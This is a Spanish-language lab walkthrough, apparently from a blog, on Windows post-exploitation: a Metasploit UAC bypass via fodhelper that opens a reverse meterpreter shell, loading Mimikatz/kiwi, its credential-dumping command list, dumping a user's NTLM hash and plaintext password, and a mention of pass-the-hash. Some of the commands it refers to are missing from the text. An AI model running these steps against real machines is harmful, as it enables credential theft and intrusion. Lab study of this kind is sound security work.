De las herramientas mas famosas para las Post-Explotacion en Windows es la deminada Mimikatz, es una herramienta la cual tiene muchas funciones para dumpear hashes, contraseñas, crear claves, etc...
Podemos encontrar mas informacion en el siguiente link:
Lo que primero haremos sera comprometer la maquina windows teniendo un meterpreter desde metasploit, lo podremos hacer como en las anteriores veces con el modulo web_delivery, una vez que obtengamos una shell, haremos lo siguiente.
Vamos a escalar privilegios bypasseando el UAC como hicimos anteriormente.
*] Started reverse TCP handler on 192.168.5.186:5555
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (201798 bytes) to 192.168.5.181
[*] Cleaining up registry keys ...
[*] Meterpreter session 2 opened (192.168.5.186:5555 -> 192.168.5.181:49778) at 2024-11-22 04:08:21 -0500
meterpreter >
Ahora lo que vamos hacer es cargar mimikatz con el siguiente comando:
loadkiwi
Y con help kiwi podremos ver todos los comandos.
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_livessp Retrieve Live SSP creds
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitrary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
Antes haremos un getsystem para ser administradores.
Si nosotros ponemos lo siguiente para que nos vuelque todas las credenciales que encuentre en memoria:
Podremos ver que en concreto saco las credenciales (hash) de un usuario llamado d1se0, pero tampoco nos sirve mucho ya que no tenemos credenciales en texto plano.
Ahora vamos a utilizar el lenguaje nativo de mimikatz para dumpear las contraseñas que estan injectadas en memoria de la siguiente forma:
Nos esta dando la contraseña en texto plano del usuario d1se0.
En tal caso de que a lo mejor solo obtuvieramos los hashesNTLM se podria hacer un Pass-The-Hash con dicho hash para autenticarte como dicho usuario sin saber su contraseña y aunque se cambie la contraseña podras seguir pudiendo autenticarte, o tambien se puede intentar crackear el hash de forma que te de la contraseña en texto plano.